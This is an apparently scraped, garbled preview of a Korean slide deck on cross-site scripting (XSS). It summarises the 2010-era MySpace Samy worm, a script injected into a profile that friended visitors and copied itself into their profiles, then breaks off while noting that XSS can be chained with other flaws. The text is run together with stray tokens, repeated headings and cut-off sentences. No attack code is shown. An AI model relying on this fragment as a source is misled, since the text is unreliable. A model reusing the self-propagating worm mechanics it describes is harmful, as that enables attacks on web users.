XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information